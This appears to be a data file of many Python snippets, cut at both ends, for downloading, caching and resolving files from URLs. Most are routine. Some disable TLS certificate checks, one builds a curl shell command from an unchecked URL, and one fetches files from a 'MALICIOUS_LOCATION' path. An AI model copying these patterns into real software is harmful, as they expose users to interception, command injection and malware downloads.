write.write(chunk)\n\n return path\n except Exception as e:\n critical(\"Error getting image \" + str(e))\n\n try:\n os.remove(path)\n except:\n pass\n\n return None\n else:\n return None", "def _getFile(url, cachedFile=True, return_filename=False):\n assert url, \"WHY are you trying to load an empty string url?!?! Nothing good will come of this! In fact, I will assure that! 
%s\" % (url)\n md5 = hashlib.md5(url).hexdigest()\n filename = os.path.join(config.WEB_CACHE_DIR, md5)\n if os.path.exists(filename) and cachedFile:\n ret = open(filename, 'r').read()\n else:\n opener = urllib.FancyURLopener()\n ret = opener.open(url).read()\n o = open(filename, 'wb') # had to open in binary mode so PIL's Image.Open() function would work\n o.write(ret)\n o.close()\n if return_filename:\n return filename\n else:\n return ret", "def _get_file_url(path):\n return urlparse.urljoin(BASE_URL, path)", "def cached_path(url_or_filename, cache_dir=None, force_download=False, proxies=None):\n\tif cache_dir is None:\n\t\tcache_dir = PYTORCH_TRANSFORMERS_CACHE\n\tif sys.version_info[0] == 3 and isinstance (url_or_filename, Path):\n\t\turl_or_filename = str (url_or_filename)\n\tif sys.version_info[0] == 3 and isinstance (cache_dir, Path):\n\t\tcache_dir = str (cache_dir)\n\n\tparsed = urlparse (url_or_filename)\n\n\tif parsed.scheme in ('http', 'https', 's3'):\n\t\t# URL, so get it from the cache (downloading if necessary)\n\t\treturn get_from_cache (url_or_filename, cache_dir=cache_dir, force_download=force_download, proxies=proxies)\n\telif os.path.exists (url_or_filename):\n\t\t# File, and it exists.\n\t\treturn url_or_filename\n\telif parsed.scheme == '':\n\t\t# File, but it doesn't exist.\n\t\traise EnvironmentError (\"file {} not found\".format (url_or_filename))\n\telse:\n\t\t# Something unknown\n\t\traise ValueError (\"unable to parse {} as a URL or as a local path\".format (url_or_filename))", "def get_file_from_url(url):\n tmp = url\n for ch in [':', '/', '.', '?', '=', '&', ',']:\n if ch in tmp:\n tmp = tmp.replace(ch, '_')\n path_dir = path.join(path.dirname(\n path.abspath(__file__)), 'test_data/')\n return path.join(path.join(path_dir, tmp))", "def get_file_from_url(url):\n tmp = url\n for ch in [':', '/', '.', '?', '=', '&', ',']:\n if ch in tmp:\n tmp = tmp.replace(ch, '_')\n path_dir = path.join(path.dirname(\n path.abspath(__file__)), 'test_data/')\n return path.join(path.join(path_dir, tmp))", "def get_file_from_url(url):\n tmp = url\n for ch in [':', '/', '.', '?', '=', '&', ',']:\n if ch in tmp:\n tmp = tmp.replace(ch, '_')\n path_dir = path.join(path.dirname(\n path.abspath(__file__)), 'test_data/')\n return path.join(path.join(path_dir, tmp))", "def cached_path(url_or_filename, cache_dir=None):\n if cache_dir is None:\n cache_dir = PYTORCH_PRETRAINED_BERT_CACHE\n if sys.version_info[0] == 3 and isinstance(url_or_filename, Path):\n url_or_filename = str(url_or_filename)\n if sys.version_info[0] == 3 and isinstance(cache_dir, Path):\n cache_dir = str(cache_dir)\n\n parsed = urlparse(url_or_filename)\n\n if parsed.scheme in (\"http\", \"https\", \"s3\"):\n # URL, so get it from the cache (downloading if necessary)\n return get_from_cache(url_or_filename, cache_dir)\n elif os.path.exists(url_or_filename):\n # File, and it exists.\n return url_or_filename\n elif parsed.scheme == \"\":\n # File, but it doesn't exist.\n raise EnvironmentError(\"file {} not found\".format(url_or_filename))\n else:\n # Something unknown\n raise ValueError(\"unable to parse {} as a URL or as a local path\".format(url_or_filename))", "def fetch_file_from_web(server_url, path, transform_func=json.loads):\n artifact_url = \"{0}/{1}\".format(server_url, path)\n r = requests.get(artifact_url)\n r.raise_for_status()\n if transform_func:\n return transform_func(r.text)\n else:\n return r.text", "def cached_path(url_or_filename, cache_dir=None):\n if cache_dir is None:\n cache_dir = 
PYTORCH_PRETRAINED_BIGGAN_CACHE\n if sys.version_info[0] == 3 and isinstance(url_or_filename, Path):\n url_or_filename = str(url_or_filename)\n if sys.version_info[0] == 3 and isinstance(cache_dir, Path):\n cache_dir = str(cache_dir)\n\n parsed = urlparse(url_or_filename)\n\n if parsed.scheme in ('http', 'https', 's3'):\n # URL, so get it from the cache (downloading if necessary)\n return get_from_cache(url_or_filename, cache_dir)\n elif os.path.exists(url_or_filename):\n # File, and it exists.\n return url_or_filename\n elif parsed.scheme == '':\n # File, but it doesn't exist.\n raise EnvironmentError(\"file {} not found\".format(url_or_filename))\n else:\n # Something unknown\n raise ValueError(\"unable to parse {} as a URL or as a local path\".format(url_or_filename))", "def get_url(self):\n return self.get_file(uri_type=URI_URL, no_copy=True)", "def load_file_from_url(self, url: str) -> bytes:\n cached_content = self.cache_get(url)\n if cached_content is not None:\n return cached_content\n try:\n req = requests.get(url, timeout=self.requests_timeout)\n req.raise_for_status()\n content = req.content\n self.cache_set(url, content)\n except requests.RequestException as err:\n self.log_error(err)\n repl_content = self.get_replacement_file(url)\n if repl_content is None:\n raise ImageNotFound(err)\n content = repl_content\n return content", "def getOriginalFile(url):\n # does url exist?\n if url is None or url is \"\":\n return", "def web_get_file(self, url):\n try:\n print(url)\n response = requests.get(url, verify=False)\n file_buffer = BytesIO(response.content)\n file_buffer.seek(0)\n return file_buffer\n except:\n print(traceback.print_exc())\n return None", "def getfile(url):\n try:\n return urlreq.urlopen(url)\n except urlreq.HTTPError as e:\n safeprint(\"Sever returned with response code \" + str(e.getcode()) + \", download failed.\")", "def get_url(self, fname):\n self._assert_file_in_registry(fname)\n return self.urls.get(fname, \"\".join([self.base_url, fname]))", "def _lookup_url(self, endpoint, values):\r\n try:\r\n cont = self.get_container(values['container'])\r\n if cont.cdn_enabled:\r\n return \"%s/%s\" % (cont.cdn_uri, values['filename'])\r\n else:\r\n return None\r\n except: # pragma: no cover\r\n return None", "def download(self, url):\n url = URL(url)\n downloader = getattr(self, 'download_%s' % url.scheme, None)\n if downloader is None:\n msg = \"We haven't implemented the '%s' protocol yet.\" % url.scheme\n raise NotImplementedError(msg)\n fp = None\n else:\n fp = downloader(url)\n return fp", "def _s3_get_file(url):\n try:\n return S3().get_contents_from_url(url)\n except Exception as e:\n raise ScrBaseException(\"Could not load file from {0}: {1}\".format(url, e))", "def _get_file_url (url, path) :\n path = path + \"/\" + url.replace (\"/\", \"!\").replace (\":\",\"\").replace (\".\",\"-\")\n spl = path.split (\"-\")\n if len (spl) >= 2 :\n ext = spl [len (spl)-1].lower ()\n if 2 <= len (ext) <= 3 and ext in [\"png\", \"jpg\", \"zip\", \"txt\", \"gif\", \"py\", \"cpp\", \"gz\", \"pdf\", \"tif\", \"py\", \"html\", \"h\"] :\n spl = path.split (\"-\")\n spl = spl [:len(spl)-1]\n path = \"-\".join (spl) + \".\" + ext\n return path", "def get_file(url):\n helpers.make_workdir() # create temp working directory\n file_url = url + constant.MALICIOUS_LOCATION\n print(file_url)\n filename = wget.download(file_url, out=constant.WORKDIR)\n return filename", "def get_url(self):\n try:\n return self._file.url\n except AttributeError:\n raise NotImplementedError(\"Underlying file 
does not have a URL.\")", "def my_url(url):\n if USE_HTTPS:\n return url_for(url, _scheme=\"https\", _external=True)\n else:\n return url_for(url)", "def get_file(url):\n # Make request\n response = requests.get(url, stream=True)\n response.raise_for_status()\n # Read fits\n iofile = io.BytesIO(response.content)\n content_type = response.headers['Content-Type']\n if content_type == 'image/fits':\n obj = fits.open(iofile)\n else:\n raise Exception('Unknown content type: {0}.'.format(content_type))\n return obj", "def get_filename_from_url(url: str) -> str:\n return os.path.basename(urllib.parse.urlparse(urllib.parse.unquote_plus(url)).path)", "def get_file(URI):\n return file_fabric.get_class(URI).get_content(URI)", "def get_url(file):\n try:\n with open(file, 'r') as f:\n return URL + f.readlines()[0].rstrip()\n except IOError as err:\n print(\"Failed with error: %s\" % err)\n sys.exit(1)", "def GetFile(localFilename):\n\tif os.path.isabs(localFilename):\n\t\tabsFilename = localFilename\n\t\tif os.path.isfile(absFilename):\n\t\t\treturn absFilename\n\t\telse:\n\t\t\treturn None\n\telse:\n\t\tglobal resourcePaths\n\t\tfor resourceDir in resourcePaths:\n\t\t\tabsFilename = os.path.join(resourceDir, localFilename)\n\t\t\tif os.path.isfile(absFilename):\n\t\t\t\treturn absFilename\n\t\treturn None", "def get_file_by_url(url, params=None, **kwargs):\n\n try:\n req = requests.get(url=url, params=params, **kwargs)\n except requests.exceptions.RequestException:\n print(\"Error retrieving data from {}\".format(url))\n return None\n\n req.encoding = req.apparent_encoding\n res_text = \"\\n\".join([domain_to_idna(line) for line in req.text.split(\"\\n\")])\n return res_text", "def try_as_file(inp):\n file = pathlib.Path(inp)\n\n if not file.is_absolute():\n file = pathlib.Path.cwd() / file\n\n if not file.exists():\n return None\n\n try:\n # this will throw if it is a symlink that has a loop in it so that it\n # never points to a base file.\n if file.is_file():\n return file\n except OSError as ex:\n raise Except.FunctionError(\"resolving file '{}' failed: {}\".format(\n file, ex.strerror.lower() ) )\n return None", "def _filename_from_url(url):\n file_name = url.split(\"/\")[-1]\n return file_name", "def get_file(url, file_name=None):\n cache_dir = os.path.join(os.path.expanduser(\"~\"), \".jhML\")\n\n if file_name is None:\n file_name = url[url.rfind('/') + 1:]\n file_path = os.path.join(cache_dir, file_name)\n\n if not os.path.exists(cache_dir):\n os.mkdir(cache_dir)\n\n if os.path.exists(file_path):\n return file_path\n\n print(\"Downloading: \" + file_name)\n try:\n urllib.request.urlretrieve(url, file_path, show_progress)\n except (Exception, KeyboardInterrupt) as e:\n if os.path.exists(file_path):\n os.remove(file_path)\n raise\n print(\" Done\")\n\n return file_path", "def _load_external(self, url):\n if url.startswith('//'):\n # then we have to rely on the base_url\n if self.base_url and 'https://' in self.base_url:\n url = 'https:' + url\n else:\n url = 'http:' + url\n\n if url.startswith('http://') or url.startswith('https://'):\n css_body = self._load_external_url(url)\n else:\n stylefile = url\n if not os.path.isabs(stylefile):\n stylefile = os.path.abspath(\n os.path.join(self.base_path or '', stylefile)\n )\n if os.path.exists(stylefile):\n with codecs.open(stylefile, encoding='utf-8') as f:\n css_body = f.read()\n elif self.base_url:\n url = urllib.parse.urljoin(self.base_url, url)\n return self._load_external(url)\n else:\n raise ValueError(\"Could not find external style: %s\" %\n 
stylefile)\n return css_body", "def get_datafile_url(self):\n try:\n return self.datafile.url\n except ValueError:\n if core.utils.is_absolute_url(self.source):\n if self.source.startswith('s3://'):\n return None # file is in the UPLOAD_BUCKET\n return self.source\n logger.error(\"File not found at '%s'\", self.datafile.name)\n return None", "def _findfile(self, path):\n\n # Build list of possible local file paths\n if not self._isurl(path):\n # Valid local paths\n filelist = self._possible_names(path)\n # Paths in self._destpath\n filelist += self._possible_names(self.abspath(path))\n else:\n # Cached URLs in self._destpath\n filelist = self._possible_names(self.abspath(path))\n # Remote URLs\n filelist = filelist + self._possible_names(path)\n\n for name in filelist:\n if self.exists(name):\n if self._isurl(name):\n name = self._cache(name)\n return name\n return None", "def static_resource(filename):\n mime_type, encoding = mimetypes.guess_type(filename)\n try:\n fd = open(filename)\n except EnvironmentError:\n raise NotFound()\n try:\n return Response(fd.read(), content_type=mime_type)\n finally:\n fd.close()", "def getOrDownloadImageObject(self, url):\n \n if \"//\" in url:\n return self.downloadImage(url)\n else:\n return self.getPILFromPath(url)", "def staticfile(path):\n normalized_path = posixpath.normpath(urllib.unquote(path)).lstrip('/')\n absolute_path = finders.find(normalized_path)\n if not absolute_path and getattr(settings, 'STATIC_ROOT', None):\n absolute_path = os.path.join(settings.STATIC_ROOT, path)\n if absolute_path:\n return '%s%s?v=%s' % (settings.STATIC_URL, path, os.stat(absolute_path)[stat.ST_MTIME])\n return path", "def get_external_link_for_static_file(fpath=''):\r\n url_path = static(fpath)\r\n url_scheme = settings.EXTERNAL_URL_SCHEME\r\n url_host = settings.EXTERNAL_URL_HOST\r\n return f'{url_scheme}://{url_host}{url_path}'", "def load_url(url):\n\n req = urllib2.Request(url = url)\n f = urllib2.urlopen(req)\n return f.read()", "def filename_from(url):\n filename = url.split('/')[-1]\n return filename", "def get_file(self, filename, handler=False):\n result = None\n if self.exists(filename):\n file_path = join_paths(self.path, filename)\n if handler:\n result = open(file_path, 'rb')\n else:\n result = file_path\n return result", "def getfilehttps(self, url):\n ctx = ssl.create_default_context()\n ctx.check_hostname = False\n ctx.verify_mode = ssl.CERT_NONE\n response = urllib.request.urlopen(url, context=ctx)\n result = response.read()\n return result", "def _local_path_from_url(url):\n filename = '{}.epub'.format(hashlib.sha224(url).hexdigest())\n return os.path.join(books_settings.LOCAL_BOOKS_PATH, filename)", "def GetFileAssetUrl(aid: maxon.Id) -> maxon.Url:\n # Bail when the asset ID is invalid.\n if not isinstance(aid, maxon.Id) or aid.IsEmpty():\n raise RuntimeError(f\"{aid = } is not a a valid asset ID.\")\n\n # Get the user repository, a repository which contains almost all assets, and try to find the\n # asset description, a bundle of asset metadata, for the given asset ID in it.\n repo: maxon.AssetRepositoryRef = maxon.AssetInterface.GetUserPrefsRepository()\n if repo.IsNullValue():\n raise RuntimeError(\"Could not access the user repository.\")\n \n asset: maxon.AssetDescription = repo.FindLatestAsset(\n maxon.AssetTypes.File(), aid, maxon.Id(), maxon.ASSET_FIND_MODE.LATEST)\n if asset.IsNullValue():\n raise RuntimeError(f\"Could not find file asset for {aid}.\")\n\n # When an asset description has been found, return the URL of that asset in the 
\"asset:///\"\n # scheme for the latest version of that asset.\n return maxon.AssetInterface.GetAssetUrl(asset, True)", "def load(resource_url, format='auto'):\n\n if format=='auto':\n format = os.path.splitext(resource_url)[-1].strip('.')\n\n if format=='pickle':\n resource_val = pickle.load(find(resource_url))\n elif format=='raw':\n resource_val = find(resource_url).open()\n else:\n assert format not in FORMATS\n raise ValueError('Unknown format type: %s' % format)\n\n return resource_val", "def handle_url(self, url):\n parse = urlparse.urlparse(url, \"http\")\n # relative url path\n if not parse.netloc:\n parse = urlparse.urlparse(\n urlparse.urljoin(\n self.source_url,\n parse.path))\n return urlparse.urlunparse(parse)", "def get_by_filename_as_path(self, decoded_url):\n return Attachment(self.context, ServiceOperationPath(\"GetByFileNameAsPath\", [decoded_url], self.resource_path))", "def _get_source(link):\n if link.startswith(\"http://\") or link.startswith(\"https://\"):\n down = httpkie.Downloader()\n return down.download(link)\n\n if os.path.exists(link):\n with open(link) as f:\n return f.read()\n\n raise UserWarning(\"html: '%s' is neither URL or data!\" % link)", "def load_url(src):\n return LOAD(url=src)", "def url(self, name):\n if self.base_url is None:\n raise ValueError(\"This file is not accessible via a URL.\")\n url = filepath_to_uri(name)\n if url is not None:\n url = url.lstrip('/')\n return urljoin(self.base_url, url)", "def find_file(self, filename, pathlist = ['.']):\n if filename.startswith('http://') or filename.startswith('https://'):\n return (urlopen(filename), filename)\n for path in [''] + pathlist:\n filepath = abspath(path + '/' + filename)\n if isfile(filepath):\n f = open(filepath, 'r')\n return (f, filepath)\n raise FileNotFoundError(filename, pathlist)", "def load_url_content(url):\n try:\n r = requests.get(url)\n if r.ok:\n return r.text\n else:\n return None\n except Exception:\n return None", "def download_from_url(path, url):\n filename = url.split(\"/\")[-1]\n found_file = find_file(path, filename, max_depth=0)\n if found_file is None:\n filename = os.path.join(path, filename)\n logging.info(\"Downloading from %s to %s.\" % (url, filename))\n inprogress_filepath = filename + \".incomplete\"\n inprogress_filepath, _ = urllib.request.urlretrieve(\n url, inprogress_filepath, reporthook=download_report_hook)\n # Print newline to clear the carriage return from the download progress.\n print()\n tf.gfile.Rename(inprogress_filepath, filename)\n return filename\n else:\n logging.info(\"Already downloaded: %s (at %s).\" % (url, found_file))\n return found_file", "def url_filename(url):\n return os.path.basename(urlparse.urlparse(url).path)", "def _get_file_helper(self):\n page = self.course.moodle.fetch(\n self._download_url % self.id,\n None\n )\n # The resource URL should magically 303 across to the actual file\n if page.history and page.history[0].status_code == 303:\n return page, page.content\n\n # If it doesn't 303 to the actual file then there might be a download\n # link to try\n bs = bs4.BeautifulSoup(page.text, 'lxml')\n\n div = bs.find('div', class_='resourceworkaround')\n\n if div: # it's a link to the resource\n link = div.find('a').href\n\n page = self.course.moodle.fetch(\n link,\n None\n )\n return page, page.content\n\n # Perhaps it's an embedded object\n obj = bs.find('object', id='resourceobject')\n if obj:\n link = obj['data']\n\n page = self.course.moodle.fetch(\n link,\n None\n )\n return page, page.content\n\n raise ValueError(\"No 
idea how to get that resource\")", "def url(self, path=None, type_of=\"csv\"):\n\n if \"https://\" in str(path) or \"http://\" in str(path) or \"file://\" in str(path):\n return self.data_loader(str(path), type_of)\n else:\n print(\"Unknown sample data identifier. Please choose an id from the list below\")", "def url(self, path=None, type_of=\"csv\"):\n\n if \"https://\" in str(path) or \"http://\" in str(path) or \"file://\" in str(path):\n return self.data_loader(str(path), type_of)\n else:\n print(\"Unknown sample data identifier. Please choose an id from the list below\")", "def get_file(self, url, path, step_name=None, headers=None,\n transient_retry=True, strip_prefix=None, timeout=None):\n return self._get_step(url, path, step_name, headers, transient_retry,\n strip_prefix, False, timeout, '')", "def _get_filename_from_url(self) -> Optional[str]:\n file_name_portion = None\n\n right_portion = self.url.rsplit(\"/\", 1)\n if len(right_portion) == 2:\n # split any potential query params - these start with \"?\"\"\n file_name_portion = right_portion[1].split(\"?\")[0].strip()\n\n if len(file_name_portion) == 0:\n file_name_portion = None\n\n return file_name_portion", "def fileUrl(self) -> str:\n if self.urls is None or len(self.urls) == 0:\n raise InputOutputError('Chart version does not have file urls')\n\n if is_absolute_url(self.urls[0]):\n return self.urls[0]\n return posixpath.join(self.chart.repository.url, self.urls[0])", "def getResource(self, url):\n\n res = self.getRequest(url)\n return self._instantiateResource(res)", "def get(self, url, path):\n rpath = urllib.parse.urlparse(url).path\n try:\n self.sftp.get(rpath, path)\n except Exception as e:\n osaka.utils.LOGGER.warning(\n \"Encountered exception: {}\\n{}\".format(e, traceback.format_exc())\n )\n raise osaka.utils.OsakaFileNotFound(\"File {} doesn't exist.\".format(url))", "async def api_staticFile(self, path_info=None):\n if not path_info:\n raise sirepo.util.NotFound(\"empty path info\")\n self._proxy_react(f\"{sirepo.const.STATIC_D}/\" + path_info)\n p = sirepo.resource.static(sirepo.util.validate_path(path_info))\n if re.match(r\"^(html|en)/[^/]+html$\", path_info):\n return self.reply_html(p)\n return self.reply_file(p)", "def static(filename):\n return href.static(file=filename)", "def asset_url(filename=\"\", version=True):\n if filename.startswith(\"http\") or filename.startswith(\"/\"):\n return filename\n else:\n if config.static_url:\n return_url = \"http://\" + config.static_url\n else:\n return_url = \"/static\" # web.ctx.home + \"/static\"\n if filename:\n return_url += \"/\" + filename\n if version:\n return_url += \"?\" + config.asset_version\n return return_url", "def fetch(self, url):\r\n fname = os.path.join(self._cachedir, self._formatter(url))\r\n if not os.path.exists(fname):\r\n time.sleep(self._sleep)\r\n html = urllib.urlopen(url).read()\r\n with codecs.open(fname, 'w', 'utf-8') as f:\r\n soup = BeautifulSoup(html)\r\n f.write(unicode(soup))\r\n return fname", "def fetch(file_url):\n\n tmp_file_handle = NamedTemporaryFile(delete=True)\n headers = {'User-Agent': 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36'}\n\n # download file and save to temp object\n with requests.get(file_url, headers=headers, stream=True) as r:\n tmp_file_handle.write(r.content)\n\n tmp_file_handle.flush()\n\n return tmp_file_handle", "def resolve_resource(url):\n try:\n resource = soundcloud.get('/resolve', url=url)\n except HTTPError as 
e:\n if e.response.status_code == 404:\n return None\n else:\n raise\n \n return resource", "def fetch_url(url):\n logger.info(\"Resolving \" + url)\n try:\n resp = requests.get(url, timeout=1.5)\n resp.raise_for_status()\n return {\n \"resolved_url\": resp.url,\n \"raw_content\": resp.text\n }\n except Exception as e:\n logger.error('Error fetching %s' % url, e)\n return {\n \"resolved_url\": url,\n \"raw_content\": \"\",\n \"url_error\": str(e)\n }", "def fetch_maybe(cls, url, path, save=False):\n if os.path.isfile(path):\n # print(\"Found %s\" % os.path.basename(path))\n with open(path, \"rb\") as file:\n return file.read(), True\n if save:\n return cls.fetch_and_save(url, path), False\n return cls.fetch_with_retry(url), False", "def get_url(url):\r\n response = requests.get(url)\r\n content = response.content.decode(\"utf8\")\r\n return content", "def get_file(_file):\n _file = pathlib.Path(_file)\n if not _file.is_file():\n _file = None\n return _file", "def get_url_filename(url, headers=None, strip=[]):\n filename = get_url_disposition_filename(url, headers)\n if filename:\n return filename\n return get_url_straight_filename(url, strip=[])", "def _get(url):\n url = urlparse(url)\n conn = HTTPConnection(url.hostname, url.port)\n conn.request('GET', url.path+url.query)\n return conn.getresponse().fp.read()", "def get_url_straight_filename(url, strip=[], allowdir=False):\n path = urlunquote(urlsplit(url).path)\n path_parts = path.split('/')\n\n if allowdir:\n # strip empty ones\n while len(path_parts) > 1 and not path_parts[-1]:\n path_parts = path_parts[:-1]\n\n if strip:\n while path_parts and path_parts[-1] in strip:\n path_parts = path_parts[:-1]\n\n if path_parts:\n return path_parts[-1]\n else:\n return None", "def get_url(self, download_url):\n curl_cmd = self.prepare_curl_cmd()\n curl_cmd.extend(\n [\n \"--silent\",\n \"--head\",\n \"--write-out\",\n \"%{url_effective}\",\n \"--url\",\n download_url,\n \"--output\",\n \"/dev/null\",\n ]\n )\n file_url = self.download_with_curl(curl_cmd)\n return file_url", "def get_url(name, version=None):\n global urls\n\n # Only download the URL look up table once.\n if urls is None:\n from six.moves.urllib.request import urlopen\n import json\n f = urlopen(\"http://sncosmo.github.io/data/urls.json\")\n reader = codecs.getreader(\"utf-8\")\n urls = json.load(reader(f))\n f.close()\n\n key = name if (version is None) else \"{0}_v{1}\".format(name, version)\n\n return urls[key]", "def fetch_file(url, filename):\n from clinica.utils.exceptions import ClinicaException\n from urllib.request import Request, urlopen\n from urllib.error import URLError\n import shutil\n import ssl\n import os.path\n from clinica.utils.stream import cprint\n\n head_tail = os.path.split(filename)\n if not os.path.exists(head_tail[0]):\n cprint('Path to the file does not exist')\n cprint('Stop Clinica and handle this error')\n\n # Download the file from `url` and save it locally under `file_name`:\n cert = ssl.get_server_certificate((\"aramislab.paris.inria.fr\", 443))\n gcontext = ssl.SSLContext()\n req = Request(url)\n try:\n response = urlopen(req, context=gcontext)\n except URLError as e:\n if hasattr(e, 'reason'):\n cprint('We failed to reach a server.')\n cprint(['Reason: ' + e.reason])\n elif hasattr(e, 'code'):\n cprint('The server could not fulfill the request.')\n cprint(['Error code: ' + e.code])\n else:\n try:\n with open(filename, 'wb') as out_file:\n shutil.copyfileobj(response, out_file)\n except OSError as err:\n cprint(\"OS error: {0}\".format(err))", 
"def get_file_from_path(file_path):\n return Utils.get_real_file_path(file_path)", "def file_url(self, url):\n return self.is_regex_url(url, self.is_file_regex)", "def get_by_url(self, url, pool_name=None):\n\t\tif not pool_name:\n\t\t\treturn self.pool[url]\n\t\treturn getattr(self, pool_name)[url]", "def get(self, url, recache=False):\n\n cachedir = self._cachedir(url)\n cachefilename = self._cachefilename(cachedir)\n\n # If \"filename\" file exists, it's a hit; read the actual filename\n # from there and return the cached content file\n if cachefilename.exists() and not recache:\n logger.debug(f\"Cache hit for {url}\")\n with open(cachefilename) as f:\n filename = f.readline()\n return cachedir / filename\n\n # Cache miss; attempt to download the URL\n with requests.get(url, allow_redirects=True, stream=True,\n timeout=30.0) as r:\n r.raise_for_status()\n\n # Determine download filename\n filename = None\n cd = r.headers.get('content-disposition')\n if cd:\n filenames = re.findall('filename=([^;]+)', cd)\n if len(filenames) > 0:\n filename = filenames[0]\n if filename is None:\n filename = os.path.basename(urllib.parse.urlparse(url).path)\n logger.info(f\"Caching {url} ({filename})\")\n\n cachefile = cachedir / filename\n try:\n # Download file\n with open(cachefile, 'wb') as fd:\n for chunk in r.iter_content(chunk_size=1024):\n fd.write(chunk)\n\n self._writefilename(cachedir, filename)\n\n except:\n if cachefile.exists():\n cachefile.unlink()\n if cachefilename.exists():\n cachefilename.unlink()\n raise\n\n logger.debug(\"Downloaded file\")\n return cachefile", "def request_url(url, display, file=None):\n if file is not None:\n r = requests.get(url, stream=True)\n r.raise_for_status()\n with open(file, \"wb\") as fd:\n for chunk in r.iter_content(chunk_size=128):\n fd.write(chunk)\n return r.raise_for_status()\n else:\n r = requests.get(url)\n r.raise_for_status()\n if display == \"xml\":\n return xmltodict.parse(r.text)\n elif display == \"fasta\" or display == \"fastq\":\n return format_seq_content(r.text, display)\n else:\n return r.text", "def _local_fopen(self,url):\n\n m = re.search(\"(black|malware)\", url)\n\n if m:\n if m.group(1) == \"black\":\n return open(\"gsb_phishing.html\")\n elif m.group(1) == \"malware\":\n return open(\"gsb_malware2.html\")", "def url(self):\n if not self.fid:\n raise exceptions.NotCreatedError(object=self)\n\n return self._file_url(self.fid)", "def from_url(abs_url):\n from office365.sharepoint.client_context import ClientContext\n ctx = ClientContext.from_url(abs_url)\n relative_url = abs_url.replace(ctx.base_url, \"\")\n return ctx.web.get_folder_by_server_relative_url(relative_url)", "def from_url(self, url: str) -> Optional[str]:\n parsed = urlparse.urlparse(url)\n if parsed.scheme not in {'http', 'https', ''}:\n return None\n\n path = parsed.path\n if parsed.query:\n path += '?' 
+ parsed.query\n\n # Discard $1 and everything after it\n path, *_ = path.partition('$1')\n\n for domain in self.domains:\n if domain in parsed.netloc:\n break\n else:\n return None\n\n matched_sites = set()\n for code in chain(self.codes,\n getattr(self, 'test_codes', ()),\n getattr(self, 'closed_wikis', ()),\n ):\n if self._hostname(code)[1] == parsed.netloc:\n # Use the code and family instead of the url\n # This is only creating a Site instance if domain matches\n site = pywikibot.Site(code, self.name)\n pywikibot.log(f'Found candidate {site}')\n\n for iw_url in site._interwiki_urls():\n iw_url, *_ = iw_url.partition('{}')\n if path.startswith(iw_url):\n matched_sites.add(site)\n break\n\n if len(matched_sites) == 1:\n return matched_sites.pop().code\n\n if not matched_sites:\n return None\n\n raise RuntimeError(\n 'Found multiple matches for URL \"{}\": {}'\n .format(url, ', '.join(str(s) for s in matched_sites)))", "def get_from(url):\r\n try:\r\n with current_app.app_context():\r\n r = requests.get(url, timeout=current_app.config[\"TIMEOUT\"])\r\n if r.status_code == 200:\r\n return r.json()\r\n return None\r\n except:\r\n return None", "def url_to_file_storage(url):\n r = requests.get(url, stream=True)\n filename = r.url.split('/')[-1]\n content_type = r.headers.get('Content-Type', 'application/octet-stream')\n return FileStorage(stream=r.raw, filename=filename, content_type=content_type)", "def get_file(self, **kwargs) -> File:\n file_name = self._get_file_name()\n file_data = self._download_from_url()\n return File(file_name, BytesIO(file_data))", "def get_content_from_static_url(link):\n # sleep time before making web request\n sleep(SCRAPING_REQUEST_STAGGER)\n # header details for web request\n headers = {\"User-agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, \\\n like Gecko) Chrome/47.0.2526.80 Safari/537.36\"}\n response = requests.get(link, headers=headers)\n if response.status_code != 200:\n return False\n return response.content", "def get_file_name(url: str):\n filename = os.path.basename(url)\n fname, extension = os.path.splitext(filename)\n if extension:\n if \"=\" in filename:\n return filename.split(\"=\")[-1]\n return filename\n header = requests.head(url).headers\n if \"Location\" in header:\n return os.path.basename(header[\"Location\"])\n return filename", "def _process_resource(self, url):\n url_parts = urlparse.urlsplit(url)\n rel_path = url_parts.path[1:]\n fs_path = os.path.join(self.fileserver_path, rel_path)\n self.logger.info('Downloading {0} to {1}'.format(url, fs_path))\n self._execute_command('curl --create-dirs -Lo {0} {1}'\n .format(fs_path, url), retries=2)\n url = url.replace(url_parts.netloc, self.fs_base_url)\n url = url.replace(url_parts.scheme, 'http')\n return url", "def from_url(self) -> PngImagePlugin.PngImageFile:\n response = requests.get(self.url)\n img = Image.open(BytesIO(response.content))\n\n return img", "def _get_url(self, absolute):", "def get_page(url):\n try:\n return urlopen(url).read()\n except:\n return None\n return None", "def get(self):\n # If we have a cache_key, see if there is data under that key\n # in our url cache and use that if there is.\n #\n if self.cache_key and self.cache_key in self.cache:\n return self.cache[self.cache_key]\n\n # If the actual URL is the empty string, and we did not have a cached\n # result for it, then we can not retrieve anything. 
Return None.\n #\n if self.url is None or len(self.url) == 0:\n return None\n\n if not self.use_post:\n # If we are NOT using 'POST' to query the URL we can create a\n # simple urllib2.Request object.\n #\n req = urllib2.Request(self.url)\n else:\n # If we ARE using 'POST' then we need to interpret the\n # parameters out of the URL and pass them as the 'data'\n # parameter to the request object we are creating. This will\n # cause 'urlopen()' to use POST to get the results.\n #\n o = urlparse.urlsplit(self.url)\n req = urllib2.Request(o.scheme + \"://\" + o.netloc + o.path, o.query)\n\n # If 'spoof_url' is NOT None, then we\n # want our request to use the 'spoof_url' as its referrer\n #\n if self.spoof_url is not None:\n req.add_header('Referer', self.spoof_url)\n\n # What we get from the remote site is UTF-8 so decode it in to unicode\n # and then encode that as ASCII with characters that can not be\n # represented in ASCII replaced with their XML character references.\n #\n f = urllib2.urlopen(req)\n content_type = f.info()['Content-Type'].lower()\n\n # Based on the content type we need to deal with the response\n # in various ways, like unzip, or re-encoding as ascii.\n #\n if content_type == \"application/zip\":\n # In zip files we extract all the individual files.\n #\n # NOTE: Since the zipfile.ZipFile class needs a file like object\n # with the 'seek()' method we use a StringIO to hold\n # our url result data.\n #\n result = []\n stringy = StringIO(f.read())\n z = zipfile.ZipFile(stringy, 'r')\n members = z.namelist()\n for member in members:\n result.append(z.read(member))\n z.close()\n stringy.close()\n\n # The way the scraper wants to work is that it gets all parts\n # of such a zip file as a single string.. so join them all\n # together (separated by a newline character, just because.)\n #\n result = \"\\n\".join(result)\n elif content_type[0:9] == \"text/xml;\":\n ign,charset = content_type.split('=')\n\n # XXX We should just return what we get and not encode it as\n # ascii. The end point should encode if it only wants to\n # see a string... (or maybe we SHOULD do this..)\n #\n result = f.read().decode(charset).encode(\"ascii\",\n \"xmlcharrefreplace\")\n else:\n # Finally we do not know what to do with it.. just read it\n # in to a string.\n #\n result = f.read()\n\n f.close()\n if 